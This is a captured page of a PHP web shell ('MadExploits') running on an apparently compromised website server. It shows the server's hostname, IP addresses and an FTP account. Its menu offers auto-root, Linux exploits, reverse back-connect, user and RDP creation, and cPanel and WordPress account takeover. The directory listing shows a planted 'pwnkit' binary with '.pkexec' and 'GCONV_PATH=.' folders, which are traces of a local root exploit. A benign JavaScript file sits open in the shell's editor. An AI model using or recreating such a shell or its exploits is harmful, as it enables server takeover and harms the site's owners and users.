Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ParsedQueryString.js
2.44
KB
-rw-r--r--
debug.js
3.69
KB
-rw-r--r--
jquery-1.4.2.min.js
70.48
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
swfobject.js
9.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ParsedQueryString.js
/******************************************************************************* * * ParsedQueryString version 1.0 * Copyright 2007, Jeff Mott <Mott.Jeff@gmail.com>. All rights reserved. * * Redistribution and use in source and binary forms with or without * modification are permitted provided that the above copyright notice, * this condition, and the following disclaimer are retained. * * THIS SOFTWARE IS PROVIDED AS IS, AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE, ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING BUT NOT * LIMITED TO PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ******************************************************************************/ function ParsedQueryString() { this._init(); } ParsedQueryString.version = '1.0'; ParsedQueryString.prototype = { _init: function () { this._parameters = {}; if (location.search.length <= 1) return; var pairs = location.search.substr(1).split(/[&;]/); for (var i = 0; i < pairs.length; i++) { var pair = pairs[i].split(/=/); var name = this._decodeURL(pair[0]); if (Boolean(pair[1])) { var value = this._decodeURL(pair[1]); if (Boolean(this._parameters[name])) this._parameters[name].push(value); else this._parameters[name] = [value]; } } }, _decodeURL: function (url) { return decodeURIComponent(url.replace(/\+/g, " ")); }, param: function (name) { if (Boolean(this._parameters[name])) return this._parameters[name][0]; else return ""; }, params: function (name) { if (Boolean(name)) { if (Boolean(this._parameters[name])) { var values = []; for (var i = 0; i < this._parameters[name].length; i++) values.push(this._parameters[name][i]); return values; } else return []; } else { var names = []; for (var name in this._parameters) names.push(name); return names; } } };
Close